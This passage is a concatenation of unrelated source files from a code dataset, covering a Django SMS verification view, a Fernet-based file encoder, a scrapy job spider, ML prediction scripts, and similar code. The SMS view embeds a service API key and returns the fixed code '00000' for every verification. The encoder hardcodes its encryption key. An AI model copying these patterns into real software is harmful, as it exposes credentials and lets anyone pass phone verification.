ss_tot)\n return r2\n\nprint(rmse(Y, Y_pred))\nprint(r2_score(Y, Y_pred))","sub_path":"SupervisedLearning/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70253104","text":"from panoptes.utils import error\n\n\ndef on_enter(event_data):\n \"\"\"\n In the `scheduling` state we attempt to find a field using our scheduler. If field is found,\n make sure that the field is up right now (the scheduler should have taken care of this). If\n observable, set the mount to the field and calls `start_slewing` to begin slew.\n\n If no observable targets are available, `park` the unit.\n \"\"\"\n pocs = event_data.model\n pocs.next_state = 'observing'\n\n # If it is not dark enough to observe, go back to ready state\n # The ready state will then decide whether to park, focus, take flats etc\n if not pocs.is_dark(horizon='observe'):\n pocs.say('Not dark enough to continue scheduling. Going back to the ready state.')\n pocs.next_state = \"ready\"\n return\n\n pocs.say(\"Selecting the next target to observe...\")\n existing_observation = pocs.observatory.current_observation\n\n # Get the next observation\n try:\n observation = pocs.observatory.get_observation()\n pocs.logger.info(f\"Observation: {observation}\")\n\n except error.NoObservation:\n pocs.say(\"No valid observations found. Going back to the ready state.\")\n pocs.next_state = 'ready'\n return\n\n except Exception as e:\n pocs.logger.warning(f\"Error in scheduling: {e!r}. Going back to the ready state.\")\n pocs.next_state = 'ready'\n return\n\n if existing_observation and observation.name == existing_observation.name:\n pocs.say(f\"I'm sticking with {observation.name}.\")\n pocs.observatory.current_observation = existing_observation\n\n else:\n pocs.say(f\"I'm going to check out: {observation.name}.\")\n","sub_path":"src/huntsman/pocs/states/huntsman/scheduling.py","file_name":"scheduling.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321502433","text":"import torch\nimport pandas as pd\nimport numpy as np\nfrom trainOps import DataLoader, compute_loss, get_mask, compute_prediction_loss\n\nCONST_LEN = 28\n\n\ndef make_prediction(model, dat, src_m, tar_m, datLoader, device):\n # send model to GPU\n model.to(device)\n model.eval()\n # send tensors to GPU\n src_mask, tar_mask = src_m.to(device), tar_m.to(device)\n mu = torch.Tensor(datLoader.mu).to(device)\n scale = torch.Tensor(dataLoader.scale).to(device)\n id = []\n pred = []\n for i, (batch_id, cat, x, y) in enumerate(datLoader.get_submission_batch(dat)):\n # print(\"prediction mini-batch : \", i)\n id.extend(batch_id)\n cat, x, y = cat.to(device), x.to(device), y.to(device)\n out = model.forward(cat, x, y, src_mask, tar_mask)\n v_out = out.squeeze(1) * scale[CONST_LEN:] + mu[CONST_LEN:]\n flag = torch.round(v_out) > 0\n v_out = flag * torch.ceil(v_out)\n v_out = v_out.cpu().numpy()\n v_out = v_out[:, -CONST_LEN:]\n # print(v_out[1, 1:])\n # print(\"=====\")\n pred.extend(v_out.tolist())\n # print(id[:5])\n output = pd.DataFrame(pred, index=id, columns=[\"F\"+str(i) for i in range(1, 29)])\n output.index.name = \"id\"\n return output\n\n\ndef load_model(checkpoint_path):\n # load model\n # replace x by the epoch number\n checkpoint = torch.load(checkpoint_path)\n model = checkpoint[\"model\"]\n model.load_state_dict(checkpoint[\"state_dict\"])\n for parameter in model.parameters():\n parameter.requires_grad = False\n return model\n\n\n# set up GPU\ndevice = torch.device(\"cpu\")\nmodel = load_model(\"10_checkpoint.pth\")\nprint(\"Model loaded ...\")\n\ndataLoader = DataLoader('small_X.csv', batch_size=16, cat_exist=True, split=(90, 5, 5))\nsrc_mask, tar_mask = get_mask(4 * CONST_LEN, random=False)\n\nprint(\"validation set loaded ...\")\ndat = pd.read_csv(\"valid_X_pred.csv\", header=None)\nvalid_pred = make_prediction(model, dat, src_mask, tar_mask, dataLoader, device)\nprint(\"validation set prediction done ...\")\n\nprint(\"evaluation set loaded ...\")\ndat_ = pd.read_csv(\"eval_X_pred.csv\", header=None)\neval_pred = make_prediction(model, dat_, src_mask, tar_mask, dataLoader, device)\nprint(\"evaluation set prediction done ...\")\n\noutput = pd.concat([valid_pred, eval_pred], axis=0)\noutput.to_csv(\"prediction_.csv\")\n\n","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383581610","text":"\"\"\"javascript URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom core import views as core_views\nfrom githubfinder import views as githubfinder_views\nfrom weatherapi import views as weatherapi_views\n\nurlpatterns = [\n path('', core_views.index, name=\"index\"),\n path('dom/', core_views.dom, name=\"dom\"),\n path('dom_projects/', core_views.dom_projects, name=\"dom_projects\"),\n path('poo/', core_views.poo, name=\"poo\"),\n path('book_list/', core_views.book_list, name=\"book_list\"),\n path('xhr/', core_views.xhr, name=\"xhr\"),\n path('json/', core_views.json, name=\"json\"),\n path('chuck_norris/', core_views.chuck_norris, name=\"chuck_norris\"),\n path('callback/', core_views.callback, name=\"callback\"),\n path('easy_http/', core_views.easy_http, name=\"easy_http\"),\n path('promises/', core_views.promises, name=\"promises\"),\n path('fetch_api/', core_views.fetch_api, name=\"fetch_api\"),\n path('arrow_functions/', core_views.arrow_functions, name=\"arrow_functions\"),\n path('easy_http_2/', core_views.easy_http_2, name=\"easy_http_2\"),\n path('async_await/', core_views.async_await, name=\"async_await\"),\n path('fetch_async/', core_views.fetch_async, name=\"fetch_async\"),\n path('githubfinder/', include('githubfinder.urls')),\n path('weatherapi/', include('weatherapi.urls')),\n path('errorhandling/', include('errorhandling.urls')),\n path('regex/', include('regex.urls')),\n path('regexform/', include('regexform.urls')),\n path('newerfeatures/', include('newerfeatures.urls')),\n path('patterns/', include('patterns.urls')),\n path('tracalorie/', include('tracalorie.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"Traversy/javascript/javascript/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420791201","text":"\"\"\"\n@Project :FTP大作业完整版\n@Time :2018/09/01 15:44\n@Author :Zhenxian\n@File :s.py\n@Software :PyCharm\n\"\"\"\nimport socket\n\nHOST = '127.0.0.1' # loop back host\nPORT = 8080 # the port number must be greater than or equal to 1024\nADDRESS = (HOST, PORT) # must be a tuple\n\nss = socket.socket() # create socket\nss.bind(ADDRESS) # bind ADDRESS\nss.listen() # listen\ncon, add = ss.accept() # accept a tuple (socket_object,address)\nprint(con, add)\nres = con.recv(1024)\nprint(res)\ncon.send(b'Hello') # send binary\n\ncon.close() # close con\nss.close() # close socket_object\n","sub_path":"FTP大作业完整版/普通socket通信/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"231259671","text":"from rest_framework import viewsets, decorators, serializers, response, status, permissions\n# from django.db.models.\nimport string\nimport random\nimport datetime\nfrom django.db.models import ObjectDoesNotExist\nfrom urllib.request import urlopen\nfrom .models import Phone, Code\n\n\nclass PhoneSerializer(serializers.ModelSerializer):\n class Meta:\n model = Phone\n fields = ('id', 'phone')\n\n\nclass CodeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Code\n fields = ('id', 'code')\n\n\ndef randomString(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.digits\n # return ''.join(random.choice(letters) for i in range(stringLength))\n return '00000';\n\nclass PhoneViewSet(viewsets.ViewSet):\n @decorators.action(methods=['post'], detail=False, permission_classes=[permissions.AllowAny])\n def code(self, request):\n serializer = PhoneSerializer(data=request.data)\n if serializer.is_valid():\n phone = Phone.objects.get_or_create(phone=serializer.data['phone'])[0]\n code = Code.objects.create(phone=phone, code=randomString(),\n end=datetime.datetime.now() + datetime.timedelta(minutes=20))\n url = 'https://sms.ru/sms/send?api_id=903cf685-12bd-b4e4-31ef-a57dd97efe4b&json=1&to=%s&msg=Your+code+%s' % (\n phone.phone, code.code)\n urlopen(url)\n return response.Response({'status': 'ok'})\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @decorators.action(methods=['post'], detail=False, permission_classes=[permissions.AllowAny])\n def check(self, request):\n serializer = CodeSerializer(data=request.data)\n if serializer.is_valid():\n try:\n code = Code.objects.get(code=serializer.data['code'], phone__phone=request.data['phone'],\n end__gt=datetime.datetime.now())\n except ObjectDoesNotExist:\n return response.Response({'errors': 'not exist'})\n code.end = datetime.datetime.now()\n code.save()\n return response.Response({'status': 'ok'})\n return response.Response(serializer.errors)\n","sub_path":"phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"1132797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\n\n# 下面的import 是一样的\n# import img.basev as ba\nfrom img import basev as ba\n\nimage = cv2.imread(ba.TEMP_IMG, cv2.IMREAD_UNCHANGED)\ncv2.imshow('img1', image)\ncv2.imshow('img2', image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"how_to_use_cv2/read_an_image.py","file_name":"read_an_image.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422371359","text":"import numpy\nimport openpyxl\n\n\nexcel_document = openpyxl.load_workbook('Muestra.xlsx')\nsheet = excel_document['Hoja 1']\n\ncant_personas_renun = 0\nnoproductivo = 0\ninfeliz = 0\nsinambicion = 0\nvivelejos = 0\ntienefamilia = 0\n\nfor persona in sheet.iter_cols(min_col=2, max_col=9):\n value = persona[9].value\n if value == 1: #Si la persona renunció\n cant_personas_renun += 1\n line = 0\n for preguntas in persona:\n line += 1\n if line == 2:\n noproductivo += preguntas.value\n elif line == 3:\n infeliz += preguntas.value\n elif line == 4:\n sinambicion += preguntas.value\n elif line == 5:\n vivelejos += preguntas.value\n elif line == 6:\n tienefamilia += preguntas.value\n\n #print('%s: cell.value=%s' % (cell, cell.value))\n\n\nporc_noproductivo = noproductivo * 100 / cant_personas_renun\nporc_infeliz = infeliz * 100 / cant_personas_renun\nporc_sinambicion = sinambicion * 100 / cant_personas_renun\nporc_vivelejos = vivelejos * 100 / cant_personas_renun\nporc_tienefamilia = tienefamilia * 100 / cant_personas_renun\n\n\nprint('No Productivos: %s' % (porc_noproductivo))\nprint('No es Feliz: %s' % (porc_infeliz))\nprint('No tiene ambición: %s' % (porc_sinambicion))\nprint('Vive lejos: %s' % (porc_vivelejos))\nprint('Tiene Familia: %s' % (porc_tienefamilia))\n\n\nnoproductivo = noproductivo / cant_personas_renun\ninfeliz = infeliz / cant_personas_renun\nsinambicion = sinambicion / cant_personas_renun\nvivelejos = vivelejos / cant_personas_renun\ntienefamilia = tienefamilia / cant_personas_renun\n\n\nopciones = ['No Productivos', 'No es Feliz', 'No tiene ambición', 'Vive lejos', 'Tiene Familia']\nprobabilidades = [noproductivo, infeliz, sinambicion, vivelejos, tienefamilia]\n\neleccion = numpy.random.choice(opciones, p=probabilidades)\nprint()\nprint('Es muy probable que un empleado se vaya de la empresa porque: %s' % (eleccion))\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"88413192","text":"from OWDTestToolkit.global_imports import *\n\nimport callThisNumber ,\\\n createContactFromThisNum ,\\\n hangUp ,\\\n enterNumber ,\\\n openCallLog ,\\\n callLog_call ,\\\n callLog_createContact ,\\\n callLog_addToContact ,\\\n addThisNumberToContact ,\\\n _complete_addNumberToContact,\\\n createMultipleCallLogEntries\n\nclass Dialer (\n callThisNumber.main,\n createContactFromThisNum.main,\n hangUp.main,\n enterNumber.main,\n openCallLog.main,\n callLog_call.main,\n callLog_createContact.main,\n callLog_addToContact.main,\n addThisNumberToContact.main,\n _complete_addNumberToContact.main,\n createMultipleCallLogEntries.main):\n \n def __init__(self, p_parent):\n self.apps = p_parent.apps\n self.data_layer = p_parent.data_layer\n self.parent = p_parent\n self.marionette = p_parent.marionette\n self.UTILS = p_parent.UTILS\n\n def launch(self):\n #\n # Launch the app (it's called a different name to the everyone knows it as, so hardcode it!).\n #\n self.app = self.apps.launch(\"Phone\")\n self.UTILS.waitForNotElements(DOM.GLOBAL.loading_overlay, self.__class__.__name__ + \" app - loading overlay\")\n return self.app\n \n \n \n ","sub_path":"OWDTestToolkit/apps/Dialer/__main.py","file_name":"__main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225905976","text":"# -*- coding: utf-8 -*-\nimport scrapy\n# from items.py import BossItem\nfrom boss.items import BossItem\n\n# class BossZhipinSpider(scrapy.Spider):\n# name = 'boss_zhipin'\n# allowed_domains = ['zhipin.com']\n# start_urls = ['http://zhipin.com/']\n#\n# def parse(self, response):\n# pass\n\nclass ZhipinSpider(scrapy.Spider):\n #定义spider的名字\n name = 'job'\n #定义爬取的域\n allowed_domains = ['www.zhipin.com']\n #定义入口url\n start_urls = ['https://www.zhipin.com/job_detail/?query=python&scity=101010100&industry=&position=']\n #定义解析规则,这个方法必须叫parse\n def parse(self, response):\n # item = BossItem()\n body = response.css(\".job-primary\")\n for head in body:\n item = BossItem()\n item[\"title\"] = head.css(\".job-title::text\").extract()[0]\n item[\"wage\"] = head.css(\".red::text\").extract()[0]\n item[\"site\"] = head.css(\".info-primary p::text\").extract_first().strip()\n item[\"name\"] = head.css(\".company-text .name a::text\").extract_first()\n yield item\n #翻页\n next_page = response.css(\".page .next::attr(href\").extract()[0]\n if next_page is not None:\n yield response.follow('https://www.zhipin.com'+next_page,callback=self.parse)\n #链接不完全,需要补充\n\n\n\n\n\n","sub_path":"2018824/scrapy/boss/boss/spiders/boss_zhipin.py","file_name":"boss_zhipin.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"203095817","text":"import datetime\nimport sys\n\ndef csvToList(filename):\n f = open(filename,'r')\n dataStr = f.read() #read data as one string\n lines = dataStr.split(\"\\n\") #get list of lines\n table = {} # create our final destination for our list of dictionaries table\n headers = lines[0].split(',') #line 0 is the headers - save these as a list\n i = 0 # row/line counter\n for line in lines: #go through each line\n cols = line.split(',') #break eac line into columns\n if len(cols) == len(headers) and i != 0:#check to make sure each row has \n #column for each header item \n row = {} #create a new blank row dictionary\n colNum = 1 #colcounter - keep strack of the col number\n for field in headers[1:]: #go through each col and header\n row[field] = cols[colNum] #set the dict. @ the field key to the cell data\n colNum += 1 \n table[cols[0]] = row # append the row dictionary to the table row list\n i += 1\n return table # retrun the finished table\n \nhourlyWeather = csvToList('weather2013_2.csv')\nhours = hourlyWeather.keys()\n\n#print('\\n'.join(sorted(times[times.keys()[0]])))\n\ncolnames = [\"summary\",\n \"precipIntensity\",\n \"precipProbability\",\n \"temperature\",\n \"apparentTemperature\",\n \"dewPoint\",\n \"humidity\",\n \"windSpeed\",\n \"windBearing\",\n \"visibility\",\n \"pressure\"]\n\n\t\nfor month in [int(sys.argv[1])]:\n# month+=1\n print(month)\n f = open('files\\mod{}.csv'.format(month), 'r')\n hourlystats = {}\n for i in hours:\n hourlystats[i]={'count':0, 'count_tip':0, 'total_tip':0, 'count_toll':0, 'total_toll':0, 'total':0, 'cash':0,\n 'card':0, 'disputed':0, 'nocharge':0, 'unknown':0}\n\n buf = ',pickup_datetime,payment_type,tip_amount,tolls_amount,total_amount,'+','.join(colnames)+'\\n'\n i=0\n for line in f:\n vals = line.split(',')\n if i==0:\n headers = vals\n else:\n timestamp = vals[0]\n tipamount = float(vals[2])\n tollamount = float(vals[3])\n totalamount = float(vals[4])\n paytype = vals[1]\n currenthour = datetime.datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S') + datetime.timedelta(minutes=30)\n # weatherhour = datetime.datetime.strftime(currenthour, '\"%Y-%m-%d %H:00:00\"')\n weatherhour = datetime.datetime.strftime(currenthour, '%Y-%m-%d %H:00:00')\n if weatherhour == '2013-03-10 02:00:00': weatherhour = '2013-03-10 03:00:00' #daylight saving\n if weatherhour == '2014-01-01 00:00:00': weatherhour = '2013-12-31 23:00:00' #adding 30 minutes passes 2014 at the last day of month\n hourlystats[weatherhour]['count'] += 1\n if tipamount>0:\n hourlystats[weatherhour]['count_tip'] += 1\n hourlystats[weatherhour]['total_tip'] += tipamount\n if tollamount>0:\n hourlystats[weatherhour]['count_toll'] += 1\n hourlystats[weatherhour]['total_toll'] += tipamount\n if 'CSH' in paytype: hourlystats[weatherhour]['cash'] += 1\n elif 'CRD' in paytype: hourlystats[weatherhour]['card'] += 1\n elif 'DIS' in paytype: hourlystats[weatherhour]['disputed'] += 1\n elif 'NOC' in paytype: hourlystats[weatherhour]['nocharge'] += 1\n else: hourlystats[weatherhour]['unknown'] += 1\n hourlystats[weatherhour]['total'] += totalamount\n i+=1\n if i%100000 == 0:\n print(i)\n f.close()\n\ng = open('hourlyStats{}.csv'.format(str(sys.argv[1])), 'w')\n\nbuf = ''\nnewheads = ['count','count_tip','total_tip','count_toll','total_toll','total','cash','card','disputed','nocharge','unknown']\nf = open('weather2013_2.csv', 'r')\ni=0\nfor line in f:\n if i==0:\n buf += line.split('\\n')[0] + ',' + ','.join(newheads) + '\\n'\n i+=1\n else:\n tstamp = line.split(',')[0]\n buf += (line.split('\\n')[0] + ',' + ','.join([str(hourlystats[tstamp][j]) for j in newheads]) + '\\n')\n i+=1\ng.write(buf)\n\n\n\n\n ","sub_path":"taxiweather3.py","file_name":"taxiweather3.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"349257789","text":"from math import factorial\ndef solution(n, k):\n answer = []\n a = [ i for i in range(1,n+1)]\n \n while n != 0:\n \n f = factorial(n)\n v = f // n\n s = a.pop(((k-1) // v))\n \n answer.append( s )\n n = n - 1\n k = k % v\n\n return answer\n\n\nprint(solution(3,5))","sub_path":"Programmers/Programmers_코딩테스트 연습_연습문제_줄 서는 방법.py","file_name":"Programmers_코딩테스트 연습_연습문제_줄 서는 방법.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"237747345","text":"import linecache\nfrom cryptography.fernet import Fernet\n\n\ndef encode_img(file):\n with open(file + \".png\", \"rb\") as f:\n img = f.read()[4:]\n\n with open(file + \".wfi\", \"wb\") as code:\n code.write(b\"\\x89WFI\" + img)\n\n\ndef decode_img(file):\n with open(file + \".wfi\", \"rb\") as code:\n img = code.read()[4:]\n\n with open(file + \".png\", \"wb\") as f:\n f.write(b'\\x89PNG' + img)\n\n return file + \".png\"\n\n\ndef encode_music(file):\n with open(file + \".mp3\", \"rb\") as f:\n music = f.read()[3:]\n\n with open(file + \".wfm\", \"wb\") as code:\n code.write(b\"\\x89WFM\" + music)\n\n\ndef decode_music(file):\n with open(file + \".wfm\", \"rb\") as code:\n music = code.read()[4:]\n\n with open(file + \".mp3\", \"wb\") as f:\n f.write(b'ID3' + music)\n\n return file + \".mp3\"\n\n\n# key = b'PZmLBwWOdMfupJIGWQEGjsxZJ5iQ9NqTbtJOlYrO9SU=' #Fernet.generate_key()\n# print(key)\n#\n# cipher = Fernet(key)\n# text = 'define kirill = Character(\"Кирилл\", color=\"#c8ffc8\")'.encode('utf-8')\n# encrypted = cipher.encrypt(text)\n# print(encrypted)\n#\n# decript = cipher.decrypt(encrypted)\n# print(decript)\n# print(decript.decode('utf-8'))\n\nkey = b'PZmLBwWOdMfupJIGWQEGjsxZJ5iQ9NqTbtJOlYrO9SU='\n\n\ndef encode_script(file):\n cipher = Fernet(key)\n with open(file + \".wfpy\") as f:\n lines = sum(1 for line in f) + 1\n\n with open(file + \".wfs\", \"wb\") as f:\n for l in range(1, lines):\n string = linecache.getline(file + \".wfpy\", l)[:-1]\n string = string.encode('utf-8')\n string = cipher.encrypt(string)\n f.write(string + b\"\\n\")\n\n\ndef decode_script(file, i):\n cipher = Fernet(key)\n with open(file + \".wfs\") as f:\n lines = sum(1 for line in f) + 1\n\n if i < 1 or i > lines:\n raise Exception('Out of file. File have ' + str(lines) + \" lines then You try to read \" + str(i) + \" line\")\n\n string = linecache.getline(file + \".wfs\", i)[:-1].encode()\n string = cipher.decrypt(string)\n string = string.decode('utf-8')\n return string","sub_path":"utils/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652997760","text":"\nimport string\nimport csv\nfrom StringIO import StringIO\n\nfrom interface.objects import AttachmentType\nfrom pyon.public import IonObject, RT\nfrom ion.util.zip import zip_of_b64\nfrom ooi.logging import log\n\nQA_DOCS_MANIFEST_FILE = \"MANIFEST.csv\"\n\nclass QADocParser(object):\n\n def __init__(self):\n self.csv_reader = None\n self.qa_zip_obj = None\n\n def prepare(self, qa_documents_zip_b64):\n self.csv_reader = None\n self.qa_zip_obj = None\n\n qa_zip_obj, b64err = zip_of_b64(qa_documents_zip_b64, \"qa_documents\")\n\n if None is qa_zip_obj:\n return False, (\"Base64 error: %s\" % b64err)\n\n #parse the manifest file\n if not QA_DOCS_MANIFEST_FILE in qa_zip_obj.namelist():\n return False, (\"provided qa_documents zipfile lacks manifest CSV file called %s\" %\n QA_DOCS_MANIFEST_FILE)\n\n log.debug(\"extracting manifest csv file\")\n csv_contents = qa_zip_obj.read(QA_DOCS_MANIFEST_FILE)\n\n log.debug(\"parsing manifest csv file\")\n try:\n dialect = csv.Sniffer().sniff(csv_contents)\n except csv.Error:\n dialect = csv.excel\n except Exception as e:\n return False, (\"%s - %s\", str(type(e)), str(e.args))\n csv_reader = csv.DictReader(StringIO(csv_contents), dialect=dialect)\n\n #validate fields in manifest file\n log.debug(\"validing manifest csv file\")\n for f in [\"filename\", \"name\", \"description\", \"content_type\", \"keywords\"]:\n if not f in csv_reader.fieldnames:\n return False, (\"Manifest file %s missing required field %s\" %\n (QA_DOCS_MANIFEST_FILE, f))\n\n self.csv_reader = csv_reader\n self.qa_zip_obj = qa_zip_obj\n\n return True, \"\"\n\n\n def convert_to_attachments(self):\n\n assert(self.csv_reader is not None)\n assert(self.qa_zip_obj is not None)\n\n #create attachment resources for each document in the zip\n log.debug(\"creating attachment objects\")\n attachments = []\n for row in self.csv_reader:\n att_name = row[\"filename\"]\n att_desc = row[\"description\"]\n att_content_type = row[\"content_type\"]\n att_keywords = string.split(row[\"keywords\"], \",\")\n\n if not att_name in self.qa_zip_obj.namelist():\n return None, (\"Manifest refers to a file called '%s' which is not in the zip\" % att_name)\n\n attachments.append(IonObject(RT.Attachment,\n name=att_name,\n description=att_desc,\n content=self.qa_zip_obj.read(att_name),\n content_type=att_content_type,\n keywords=att_keywords,\n attachment_type=AttachmentType.BLOB))\n\n log.debug(\"Sanity checking manifest vs zip file\")\n if len(self.qa_zip_obj.namelist()) - 1 > len(attachments):\n log.warn(\"There were %d files in the zip but only %d in the manifest\",\n len(self.qa_zip_obj.namelist()) - 1,\n len(attachments))\n\n return attachments, \"\"\n","sub_path":"ion/util/qa_doc_parser.py","file_name":"qa_doc_parser.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"423604786","text":"# Creating a Log Widget using singleton pattern\n# Returns a series of strings where as the last inserted string appears on top\n\n# How to use:\n# use import LogWidget as lw\n# log_widget = LogWidget()\n# from where you want to write messages to the widget, use\n# log_widget.push(\"String\")\n# to get the whole text, use log_widget.update()\n\nimport tkinter as tk\n\n\nclass PseudocodeWidget:\n class __PseudocodeWidget:\n\n def __init__(self, master):\n self.labels = [tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\"),\n tk.Label(master=master, bg=\"#2b2b2b\")]\n\n self.pseudocode_list = []\n\n __instance = None\n\n def __init__(self, master):\n if not PseudocodeWidget.__instance: # There is no instance\n PseudocodeWidget.__instance = PseudocodeWidget.__PseudocodeWidget(master)\n\n def get_instance(self):\n return self.__instance\n\n def restore_default(self):\n # restore default values for all labels\n for entry in self.__instance.labels:\n entry.config(text=\"\", bg=\"#2b2b2b\")\n\n # returns label element at given index\n def get_label(self, position):\n return self.get_instance().labels[position]\n\n # returns Array/List with all labels\n def get_all_labels(self):\n all_label = []\n for element in self.get_instance().labels:\n all_label.append(element)\n return all_label\n\n def update(self, filename, line):\n self.open_text_file(filename)\n self.set_color(\"palegreen\", line)\n\n\n def pack_labels(self):\n for element in self.get_instance().labels:\n element.pack(side=\"top\", fill=\"both\")\n\n def set_color(self, color, index):\n self.get_label(index)[\"bg\"] = color\n self.get_label((index))[\"fg\"] = \"black\"\n\n # open File wich contains pseudocode\n def open_text_file(self, string):\n self.restore_default()\n file = open(string, mode=\"r\")\n position = 0\n for line in file:\n PseudocodeWidget.__instance.labels[position].config(text=line, bg=\"#2b2b2b\", fg=\"#a9b7c6\", anchor=\"nw\",\n font=\"helvetica, 14\", height=1)\n position += 1\n\n","sub_path":"pseudocode_widget.py","file_name":"pseudocode_widget.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"250064025","text":"\r\n#import os, sys, platform\r\nimport copy\r\nfrom core import dbop, files, argv, urlpy\r\nfrom flask import g\r\nfrom libs import cjnews, cjtool\r\n\r\n# 方法格式: {xxx}Act\r\n# xxx优先顺序 : mkvs.key > mkvs._type > '_def'\r\n\r\n# main名称固定\r\nclass main:\r\n\r\n # `__init__`一致格式\r\n def __init__(self, app):\r\n self.app = app\r\n self.data = {}\r\n self.cfgs = argv.init('1')\r\n self.db = dbop.dbm(self.cfgs['cdb'])\r\n self.cj = cjnews.main()\r\n\r\n # 规则搜索\r\n def indexAct(self):\r\n #url = 'http://txjia.com/'\r\n #a = urlpy.svurl(url, 'debug')\r\n parts = {}\r\n parts['city'] = argv.get('city')\r\n parts['name'] = argv.get('name')\r\n parts['rid'] = argv.get('rid')\r\n rules = self.cj.getRules(parts, 'dict', 1)\r\n data = {'rules':rules, 'city':parts['city'], 'name':parts['name'], 'rid':parts['rid']}\r\n return data\r\n\r\n # 爬连接-测试\r\n def linksAct(self):\r\n rule = self.getRule()\r\n if not rule:\r\n return {'links':{}, 'rule':{}}\r\n links = self.cj.getUList(rule)\r\n data = {'links':links, 'rule':rule}\r\n return data\r\n\r\n # 爬详情-测试\r\n def detailAct(self):\r\n rule = self.getRule()\r\n if not rule:\r\n return {'detail':{}, 'rule':{}}\r\n url = argv.get('url')\r\n title = argv.get('title')\r\n detail = self.cj.getDetail(rule, url)\r\n rowb = {'title':title,'url':url}\r\n skips = cjtool.skips(rule, rowb, detail);\r\n data = {'detail':detail, 'skips':skips, 'rule':rule, 'rowb':rowb}\r\n return data\r\n\r\n def getRule(self):\r\n rid = argv.get('rule')\r\n sql = \"SELECT * FROM {crawl_rule} WHERE id=\"+rid\r\n return self.db.get(sql,(),1)\r\n\r\n'''\r\n\r\n data['d'] = {}\r\n #data['d'] = {'tpname':'json'} # 指定模板\r\n #data['d'] = {'tpname':'xml'} # 指定模板\r\n #data['d'] = {'tpname':'dir', 'message':'/blog/'} # dir\r\n #data['d'] = {'code':500, 'message':'500 Message'} # dir\r\n\r\n # 默认非`detail`方法\r\n def _defAct(self):\r\n #d = {'tpname':'home/info'} # 指定模板\r\n #d = {'code':404} # 显示错误访问\r\n d = {}\r\n data = {'_defAct_msg':'from _defAct', 'd':d}\r\n return data \r\n'''\r\n","sub_path":"app/ctrls/root_npaCtrl.py","file_name":"root_npaCtrl.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"262190445","text":"from Tkinter import *\nfrom train import *\nfrom platform import *\nfrom outerline import *\nfrom db import *\nfrom usercontrol import *\nimport time\n\npltrains = [] # Trains that not on any platform yet\noutertrains = [] # Trains that not on any platform yet\nwaitingtrains = [] # Trains that not on any platform yet\ntrainl = [] # List of all trains\nplatforml = [] # List of all platforms\nouterl = [] # List of outerlines\nstartstate = False\nfps = 100/6\ncounter = 0 \ntimecnt = ''\n\nclass schtable(Frame):\n def __init__(self, parent, rows, columns):\n global trainl, waitingtrains\n Frame.__init__(self, parent, background=\"black\")\n self._widgets = []\n for row in range(rows):\n current_row = []\n for column in range(columns):\n label = Label(self, 